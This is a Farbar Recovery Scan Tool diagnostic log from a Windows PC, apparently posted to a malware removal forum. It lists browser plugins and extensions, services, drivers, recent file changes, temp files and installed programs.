FF Plugin: @Google.com/GoogleEarthPlugin - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/JavaPlugin - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @nvidia.com/3DVision - C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin: @nvidia.com/3DVisionStreaming - C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 - C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 - C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @zoom.us/ZoomVideoPlugin - C:\Users\MikeandBert\AppData\Roaming\Zoom\bin\npzoomplugin.dll (Zoom Video Communications, Inc.)
FF Extension: Lavasoft Search Plugin - C:\Users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default\Extensions\jid1-yZwVFzbsyfMrqQ@jetpack [2012-12-02]
FF HKLM\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video
FF Extension: DivX Plus Web Player HTML5 &lt;video&gt; - C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video [2011-05-06]
FF HKLM\...\Firefox\Extensions: [{6904342A-8307-11DF-A508-4AE2DFD72085}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa
FF Extension: DivX HiQ - C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa [2011-05-06]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG2012\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG2012\Firefox4 [2011-12-03]
FF HKLM\...\Firefox\Extensions: [{F53C93F1-07D5-430c-86D4-C9531B27DFAF}] - C:\Program Files\AVG\AVG2012\Firefox\DoNotTrack
FF Extension: AVG Do Not Track - C:\Program Files\AVG\AVG2012\Firefox\DoNotTrack [2012-05-15]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2013-12-23]

Chrome:
=======
CHR HomePage:
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\pdf.dll No File
CHR Plugin: (AVG Internet Security) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla\12.0.0.2210_0\plugins/avgnpss.dll (AVG Technologies CZ, s.r.o.)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Java Deployment Toolkit 6.0.260.3) - C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll (Sun Microsystems, Inc.)
CHR Plugin: (Java™ Platform SE 6 U26) - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (npFFApi) - C:\Program Files\CheckPoint\ZAForceField\TrustChecker\bin\npFFApi.dll No File
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (DivX Web Player) - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
CHR Plugin: (Google Earth Plugin) - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.124\npGoogleUpdate3.dll No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Unity Player) - C:\Users\MikeandBert\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll No File
CHR Plugin: (Windows Presentation Foundation) - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_5_502_110.dll No File
CHR Extension: (Google Drive) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-27]
CHR Extension: (YouTube) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-12-27]
CHR Extension: (Google Search) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-27]
CHR Extension: (DivX HiQ) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjbmmemklcjgepojigaapkoodmkgbae [2012-12-27]
CHR Extension: (AVG Safe Search) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla [2012-12-27]
CHR Extension: (FBPHOTOZOOM) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpieaakhacmfleokhjcjnpcnmnmpfkid [2012-12-27]
CHR Extension: (AVG Do Not Track) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2012-12-27]
CHR Extension: (DivX Plus Web Player HTML5 video) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm [2012-12-27]
CHR Extension: (Gmail) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-27]
CHR HKLM\...\Chrome\Extension: [fnjbmmemklcjgepojigaapkoodmkgbae] - C:\Program Files\DivX\DivX Plus Web Player\google_chrome\wpa\wpa.crx [2011-02-07]
CHR HKLM\...\Chrome\Extension: [jmfkcklnlgedgbglfkkgedjfmejoahla] - C:\Program Files\AVG\AVG2012\Chrome\safesearch.crx [2012-07-26]
CHR HKLM\...\Chrome\Extension: [knkakpihealnpggeceajhaonlmgdkaip] - C:\Users\MIKEAN~1\AppData\Local\Temp\tbch.crx [2012-07-26]
CHR HKLM\...\Chrome\Extension: [mpieaakhacmfleokhjcjnpcnmnmpfkid] - C:\Program Files\fbphotozoom\fbphotozoom16.crx [2012-04-05]
CHR HKLM\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\Program Files\AVG\AVG2012\Chrome\donottrack.crx [2012-04-20]
CHR HKLM\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files\DivX\DivX Plus Web Player\google_chrome\html5video\html5video.crx [2011-02-07]

========================== Services (Whitelisted) =================

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2012\AVGIDSAgent.exe [5175856 2013-10-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.)
S4 GameConsoleService; C:\Program Files\eMachines Games\eMachines Game Console\GameConsoleService.exe [165416 2008-05-05] (WildTangent, Inc.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [11736 2011-04-27] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [142176 2012-12-10] (AVG Technologies CZ, s.r.o. )
R3 AVGIDSFilter; C:\Windows\System32\DRIVERS\avgidsfilterx.sys [24144 2011-12-23] (AVG Technologies CZ, s.r.o. )
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [24896 2012-04-19] (AVG Technologies CZ, s.r.o. )
R3 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [17232 2011-12-23] (AVG Technologies CZ, s.r.o. )
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [250080 2012-11-08] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [41040 2011-12-23] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [31952 2012-01-31] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [302368 2013-04-11] (AVG Technologies CZ, s.r.o.)
S3 BVRPMPR5; C:\Windows\system32\drivers\BVRPMPR5.SYS [49904 2010-11-03] (Avanquest Software) [File not signed]
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [13560 2012-12-02] (GFI Software)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
R3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
S3 V0415Vid; C:\Windows\System32\DRIVERS\V0415Vid.sys [286208 2009-08-03] (Creative Technology Ltd.)
S1 CSN5PDTS82; System32\Drivers\CSN5PDTS82.sys [X]
S1 CSN5PDTS82x64; System32\Drivers\CSN5PDTS82x64.sys [X]
S1 dcohjryh; \??\C:\Windows\system32\drivers\dcohjryh.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-07-19 19:17 - 2014-07-19 19:17 - 00002341 _____ () C:\Users\MikeandBert\Desktop\Multiple dllhost.exe-Com Surrogate processes running - Virus, Trojan, Spyware, and Malware Removal Logs.url
2014-07-19 15:19 - 2014-07-19 15:19 - 00000000 ____D () C:\Windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-19 14:55 - 2014-07-20 12:20 - 00000000 ____D () C:\FRST
2014-07-19 14:52 - 2014-07-20 12:20 - 00000000 ____D () C:\Users\MikeandBert\Desktop\com fix
2014-07-08 22:44 - 2014-06-06 17:19 - 02051072 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-07-08 22:44 - 2014-06-06 17:05 - 12353024 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-07-08 22:44 - 2014-06-06 16:25 - 09711616 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-07-08 22:44 - 2014-06-06 16:12 - 01810432 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-07-08 22:44 - 2014-06-06 16:04 - 01106432 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-07-08 22:44 - 2014-06-06 16:03 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-07-08 22:44 - 2014-06-06 16:02 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-07-08 22:44 - 2014-06-06 16:00 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-07-08 22:44 - 2014-06-06 15:58 - 00065024 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-07-08 22:44 - 2014-06-06 15:57 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-07-08 22:44 - 2014-06-06 15:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-07-08 22:44 - 2014-06-06 15:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 01796096 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-07-08 22:44 - 2014-06-06 15:52 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-07-08 22:44 - 2014-06-06 15:51 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-07-08 22:44 - 2014-06-06 15:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-07-08 22:44 - 2014-06-06 01:59 - 00506880 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-07-08 22:44 - 2014-05-29 23:53 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-06-25 10:59 - 2014-06-25 10:59 - 00000000 ____D () C:\Users\MikeandBert\AppData\Local\Adobe

==================== One Month Modified Files and Folders =======

2014-07-20 12:20 - 2014-07-19 14:55 - 00000000 ____D () C:\FRST
2014-07-20 12:20 - 2014-07-19 14:52 - 00000000 ____D () C:\Users\MikeandBert\Desktop\com fix
2014-07-20 12:20 - 2011-11-16 02:59 - 00000896 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-07-20 12:19 - 2011-11-16 02:59 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-07-20 12:17 - 2013-04-18 22:02 - 00065536 _____ () C:\Windows\system32\Ikeext.etl
2014-07-20 12:17 - 2006-11-02 05:47 - 00003216 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-07-20 12:17 - 2006-11-02 05:47 - 00003216 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-07-20 12:16 - 2008-09-04 17:48 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-07-20 12:16 - 2006-11-02 06:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-07-20 11:50 - 2006-10-11 00:09 - 01731353 _____ () C:\Windows\WindowsUpdate.log
2014-07-20 11:32 - 2013-10-22 15:08 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-07-20 10:42 - 2011-12-03 17:34 - 00000000 ____D () C:\Windows\system32\Drivers\AVG
2014-07-20 10:28 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\tracing
2014-07-19 20:42 - 2006-11-02 06:01 - 00032590 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-07-19 19:17 - 2014-07-19 19:17 - 00002341 _____ () C:\Users\MikeandBert\Desktop\Multiple dllhost.exe-Com Surrogate processes running - Virus, Trojan, Spyware, and Malware Removal Logs.url
2014-07-19 15:33 - 2011-09-08 03:05 - 00002106 _____ () C:\Windows\epplauncher.mif
2014-07-19 15:19 - 2014-07-19 15:19 - 00000000 ____D () C:\Windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-17 23:53 - 2006-11-02 03:33 - 00762234 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-09 03:25 - 2006-11-02 05:47 - 00379856 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-07-09 03:24 - 2008-01-20 19:47 - 00203668 _____ () C:\Windows\PFRO.log
2014-07-09 03:21 - 2006-11-02 05:37 - 00000000 ____D () C:\Program Files\Windows Journal
2014-07-09 03:05 - 2013-08-14 03:14 - 00000000 ____D () C:\Windows\system32\MRT
2014-07-09 03:02 - 2006-11-02 03:24 - 93585272 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-07-08 11:28 - 2012-06-14 08:08 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-07-08 11:28 - 2011-10-16 04:39 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-07-08 06:20 - 2012-07-07 15:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-06-26 13:55 - 2014-05-03 14:30 - 00000000 ____D () C:\Users\MikeandBert\AppData\Roaming\Nikon
2014-06-26 13:55 - 2013-09-17 06:24 - 00000020 ____H () C:\ProgramData\PKP_DLev.DAT
2014-06-26 13:51 - 2013-05-24 19:59 - 00000000 ____D () C:\Users\MikeandBert\Desktop\bert
2014-06-25 10:59 - 2014-06-25 10:59 - 00000000 ____D () C:\Users\MikeandBert\AppData\Local\Adobe
2014-06-23 15:40 - 2009-04-09 11:34 - 00000000 ____D () C:\Users\MikeandBert\Desktop\Mike

Files to move or delete:
====================
C:\ProgramData\hash.dat

Some content of TEMP:
====================
C:\Users\MikeandBert\AppData\Local\Temp\621c1aa1-9b2a-44b7-b939-9195ece7f5a4.exe
C:\Users\MikeandBert\AppData\Local\Temp\9.0.0.2308SD_OCU_Online_9.0.0.2308.exe
C:\Users\MikeandBert\AppData\Local\Temp\a96808eb-cbfb-4bcb-9e18-4b4dd776c7a9.exe
C:\Users\MikeandBert\AppData\Local\Temp\InstallFlashPlayer.exe
C:\Users\MikeandBert\AppData\Local\Temp\nsvBD02.tmp.tbProd.dll
C:\Users\MikeandBert\AppData\Local\Temp\Uninstall.exe

==================== Bamital & volsnap Check =================

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-07-20 10:54

==================== End Of Log ============================

 

 

 

-----------------------------

 

Addition File:

Additional scan result of Farbar Recovery Scan Tool (x86) Version:20-07-2014
Ran by MikeandBert at 2014-07-20 12:21:45
Running from C:\Users\MikeandBert\Desktop\com fix
Boot Mode: Normal
==========================================================

==================== Security Center ========================

AV: Microsoft Security Essentials (Enabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Anti-Virus Free Edition 2012 (Enabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Anti-Virus Free Edition 2012 (Enabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Microsoft Security Essentials (Enabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.0.0.4080 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.0.0.4080 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 14 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 14 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)
Agere Systems PCI-SV92EX Soft Modem (HKLM\...\Agere Systems Soft Modem) (Version:  - Agere Systems)
Apple Application Support (HKLM\...\{EB879750-CCBD-4013-BFD5-0294D4DA5BD0}) (Version: 2.1.7 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{A00B9A50-3090-4CFF-9CDA-82DA0BEDAA21}) (Version: 4.0.0.96 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Panorama Maker 6 (HKLM\...\{DABFD34E-BE68-4BC6-9254-5D7A7FF76B99}) (Version: 6.0.8.85 - ArcSoft)
Audacity 2.0 (HKLM\...\Audacity_is1) (Version:  - Audacity Team)
AVG 2012 (HKLM\...\AVG) (Version: 2012.1.2247 - AVG Technologies)
AVG 2012 (Version: 12.0.1873 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.1890 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.1901 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2102 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2176 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2178 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2197 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2221 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.3955 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2238 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2240 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2241 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2242 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2247 - AVG Technologies) Hidden
Camtasia (HKLM\...\Camtasia) (Version: 3.0 - TechSmith Corporation)
CDisplay 1.8 (HKLM\...\CDisplay_is1) (Version:  - dvd8n)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6425.1000 - Microsoft Corporation)
Creative Live! Cam Video IM Ultra (VF0415) (1.01.03.00) (HKLM\...\Creative VF0415) (Version:  - )
CyberLink LabelPrint (HKLM\...\{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.0.3111 - CyberLink Corp.)
CyberLink Power2Go (HKLM\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.5.4316 - CyberLink Corp.)
DivX Setup (HKLM\...\DivX Setup.divx.com) (Version: 2.5.0.8 - DivX, LLC)
eMachines Games (HKLM\...\WildTangent emachines Master Uninstall) (Version: 1.0.0.52 - WildTangent)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
FileZilla Client 3.5.3 (HKLM\...\FileZilla Client) (Version: 3.5.3 - FileZilla Project)
FLAC 1.2.1b (remove only) (HKLM\...\FLAC) (Version: 1.2.1b - Xiph.org)
Free WMA to MP3 Converter 1.16 (HKLM\...\Free WMA to MP3 Converter_is1) (Version:  - Jodix Technologies Ltd.)
FreeRIP v3.66 (HKLM\...\{501451DE-5808-4599-B544-8BD0915B6B24}_is1) (Version: 3.66 - GreenTree Applications SRL)
FUJIFILM FinePixViewer S Ver.2.1 (HKLM\...\{88B32652-CAE0-4909-A463-5840D2689D93}) (Version: 2.1.0.3 - FUJIFILM Corporation)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.125 - Google Inc.)
Google Drive (HKLM\...\{75939021-3B68-419D-8DC1-E9823BFF9658}) (Version: 1.16.7009.9618 - Google, Inc.)
Google Earth (HKLM\...\{5A3C1721-F8ED-11E0-8AFB-B8AC6F97B88E}) (Version: 6.1.0.5001 - Google)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
iTunes (HKLM\...\{29ED20C9-5E15-4969-9279-25BF3727A3DA}) (Version: 10.5.0.142 - Apple Inc.)
Java™ 6 Update 26 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216013FF}) (Version: 6.0.260 - Sun Microsystems, Inc.)
Java™ 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)
LAME v3.99.3 (for Windows) (HKLM\...\LAME_is1) (Version:  - )
Malwarebytes Anti-Malware version 1.65.1.1000 (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version: 1.65.1.1000 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 2.0.181.2 - McAfee, Inc.)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
